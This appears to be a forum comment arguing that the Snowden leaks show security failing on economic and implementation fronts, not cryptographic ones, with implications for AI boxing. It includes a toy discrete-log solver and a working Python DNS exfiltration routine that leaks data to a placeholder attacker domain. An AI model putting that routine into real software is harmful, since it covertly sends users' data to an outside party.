We wouldn’t say armor research was a failure just because flintlocks eventually phased out heavy battlefield armor.
I think you missed the point of my examples. If flintlocks killed heavy battlefield armor, that was because they were genuinely superior at attack. But we are not in a ‘machine gun vs bow and arrow’ situation.
The Snowden leaks were a revelation not because the NSA had any sort of major unexpected breakthrough. They have not solved factoring. They do not have quantum computers. They have not made major progress on P=NP or reversing one-way functions. The most advanced thing in all the Snowden leaks I’ve read was the amortized attack on common hardwired primes, but that again was already well known in the open literature, which is why we were able to reconstruct it from the hints in the leaks. In fact, the leaks strongly affirmed that the security community and crypto theory have reached parity with the NSA, that things like PGP were genuinely secure (as far as the crypto went...), and that there were no surprises like differential cryptanalysis waiting in the wings. This is great, except it doesn’t matter.
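(To make the ‘amortized’ part concrete: in discrete-log attacks on Diffie-Hellman, like the published Logjam result, the expensive precomputation depends only on the prime everyone shares, not on any individual key. Here is a toy sketch of the same economics using baby-step giant-step; the numbers and code are my own construction, purely for illustration:)

```python
# Toy illustration (my own construction, not from the leaks) of why a shared,
# hardwired Diffie-Hellman prime lets an attack be amortized: in baby-step
# giant-step, the expensive table depends only on (p, g), so you build it once
# and reuse it against every key ever exchanged under that same prime.
from math import isqrt

def precompute(p, g):
    """One-time ~sqrt(p) cost, a function of the shared parameters only."""
    m = isqrt(p - 1) + 1
    baby = {}
    e = 1
    for j in range(m):
        baby.setdefault(e, j)
        e = (e * g) % p
    factor = pow(g, -m, p)  # g^(-m) mod p, for the giant steps (Python 3.8+)
    return m, baby, factor

def dlog(p, h, m, baby, factor):
    """Per-victim ~sqrt(p) cost, reusing the shared precomputation."""
    gamma = h % p
    for i in range(m):
        if gamma in baby:
            return i * m + baby[gamma]
        gamma = (gamma * factor) % p
    raise ValueError("no discrete log found")

p, g = 1000003, 2                     # toy sizes; real targets were 512-bit
m, baby, factor = precompute(p, g)    # pay the big cost once...
for secret in (12345, 99999, 424242): # ...then break each victim cheaply
    h = pow(g, secret, p)             # a victim's public DH value
    x = dlog(p, h, m, baby, factor)
    assert pow(g, x, p) == h
```

(In the real attack the precomputation is a number-field-sieve run costing weeks of supercomputer time per prime, after which individual connections fall in minutes, so a handful of hardwired primes covering most of the internet is exactly the situation an agency with a big fixed budget wants.)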
They were a revelation because they revealed how useless all of that parity was: the NSA simply attacked on the economic, business, political, and implementation planes. There is no need to beat PGP by factoring integers when you can simply tap into Gmail’s datacenters and read the emails after they have been decrypted. There is no need to worry overly much about OTR when your TAO teams divert shipments from Amazon, insert a little hardware keylogger, and record everything and exfiltrate it over DNS. Get something into a computer’s BIOS and it’ll never come out. You don’t need to worry much about academics coming up with better hash functions when your affiliated academics, who know which side their bread is buttered on, will quietly quash them in committee or ensure that something like export-grade ciphers gets included. You don’t need to worry about spending too much on deep cryptanalysis when the existence of C ensures that there will always be zero-days for you to exploit. You don’t even need to worry about revealing capabilities when you can just leak information to your buddies in the FBI or DEA, who will work their tails off to come up with a plausible non-digital story to feed the judge. (Your biggest problem, really, is figuring out how not to drown under the tsunami of data coming at you from all the hacked communications links, subverted computers, bulk collections from cloud datacenters, decrypted VPNs, etc.)
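(For anyone unfamiliar with the DNS trick: almost every network lets DNS queries out, so an implant can smuggle data by encoding it into subdomains of a zone whose authoritative nameserver the attacker runs. A minimal sketch, with a hypothetical placeholder domain:)

```python
# A minimal sketch of DNS exfiltration: stolen bytes are hex-encoded into
# subdomain labels of an attacker-controlled zone, so each "lookup" delivers
# a chunk to the attacker's authoritative nameserver, which logs every query.
# "exfil.example.com" is a hypothetical placeholder, not a real endpoint.
import socket

ATTACKER_ZONE = "exfil.example.com"  # hypothetical attacker-controlled zone
LABEL_MAX = 63                       # DNS caps each label at 63 characters

def exfiltrate(data: bytes) -> None:
    payload = data.hex()             # hex keeps the payload DNS-safe
    chunks = [payload[i:i + LABEL_MAX]
              for i in range(0, len(payload), LABEL_MAX)]
    for seq, chunk in enumerate(chunks):
        name = f"{seq}.{chunk}.{ATTACKER_ZONE}"  # e.g. 0.<hex>.exfil.example.com
        try:
            socket.getaddrinfo(name, None)  # the lookup itself is the message
        except socket.gaierror:
            pass  # NXDOMAIN is fine: the attacker's server already saw the query

exfiltrate(b"captured keystrokes")
```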
This isn’t like guns eliminating armor. This is like an army not bothering with sanitation and wondering why it keeps losing to the other guys, which turns out to be because the latrine contractors are giving kickbacks to the king’s brother.
The fact that computer security is having a hard time solving a much easier problem with a ton more resources should worry people who are into AI safety.
I agree, it absolutely does, and it’s why I find it kind of hilarious when people seem to seriously think that to do AI safety, you just need some nested VMs and some protocols. That’s not remotely close to the full scope of the problem. It does no good to come up with a secure sandbox if dozens of external pressures, incentives, cost-cutting measures, and competitive dynamics mean that the AI will be immediately let out of the box.
(The trend towards attention mechanisms and reinforcement learning in deep learning is an example of this: tool AI technologies want to become agent AIs, because that is how you get rid of expensive slow humans in the loop, make better inferences and decisions, and optimize exploration by deciding what data you need and what experiments to try.)
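(A toy sketch, my own construction, of what ‘deciding what data you need’ means in practice: an epsilon-greedy bandit allocates its own trials to the most promising experiments instead of waiting for a human to hand it a fixed dataset:)

```python
# A toy epsilon-greedy bandit (purely illustrative) of an agent that chooses
# its own experiments: exploration is optimized by the system itself, with
# no expensive slow human in the loop deciding what data to gather next.
import random

TRUE_RATES = [0.2, 0.5, 0.8]  # hidden payoff rates the agent must discover

def run_experiment(arm: int) -> float:
    """Stand-in for the world: a noisy payoff from the chosen experiment."""
    return 1.0 if random.random() < TRUE_RATES[arm] else 0.0

counts = [0] * 3
estimates = [0.0] * 3
epsilon = 0.1  # fraction of trials spent deliberately exploring

for t in range(10_000):
    if random.random() < epsilon:
        arm = random.randrange(3)  # explore: gather data on a neglected option
    else:
        arm = max(range(3), key=lambda a: estimates[a])  # exploit best guess
    reward = run_experiment(arm)
    counts[arm] += 1
    estimates[arm] += (reward - estimates[arm]) / counts[arm]  # running mean

print(estimates, counts)  # estimates near [0.2, 0.5, 0.8]; arm 2 dominates
```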